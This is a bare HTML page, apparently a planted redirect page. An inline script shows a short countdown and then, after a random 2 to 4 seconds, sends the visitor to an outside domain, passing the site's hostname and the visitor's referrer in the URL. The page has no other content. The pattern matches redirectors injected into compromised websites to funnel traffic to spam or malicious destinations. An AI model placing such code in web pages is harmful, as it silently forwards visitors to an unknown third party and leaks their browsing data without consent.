﻿<!DOCTYPE html>
<html lang="en" >

<head>
  <meta charset="UTF-8">
  <link rel="stylesheet" href="css/style.css">
</head>

<body>
<script language="JavaScript" type="text/javascript"> 
        <!-- 
        var min = 00; // set the minutes 
        var sec = Math.floor(Math.random() * (4 - 2 + 1)) + 2; // set the seconds 
                function countDown() { 
            sec--; 
            if (sec == -01) { 
                sec = 59; 
                min = min - 1; 
            } else { 
                min = min; 
            } 
 
            time = "You will be redirected in " + sec + " seconds";

			if (sec == 1) { 
                time = "You will be redirected in " + sec + " seconds"; 
            }
			
			if (sec == 0) { 
                time = "You will be redirected in " + sec + " seconds"; 
            }	
			
			if (sec == 5) { 
                time = "You will be redirected in " + sec + " seconds"; 
            }				
 
            if (document.getElementById) { 
                document.getElementById('theTime').innerHTML = time; 
            } 
 
            SD = window.setTimeout("countDown();", 1000); 
            if (min == '00' && sec == '0') { 
                sec = "00"; 
                window.clearTimeout(SD); 
            } 
        } 
        window.onload = countDown;
		
		
		function Redirect() {
               window.location="http://dshigo.com/5c57?source=" + location.hostname + "&referrer=" + encodeURIComponent(document.referrer);
            }
            
           
            setTimeout('Redirect()', sec * 1000);
        // --> 
    </script> 
	<h1><center><span id="theTime"></span></center></h1>
  <div class="container">
  <div class="item-1"></div>
  <div class="item-2"></div>
  <div class="item-3"></div>
  <div class="item-4"></div>
  <div class="item-5"></div>
</div>
  
</body>

</html>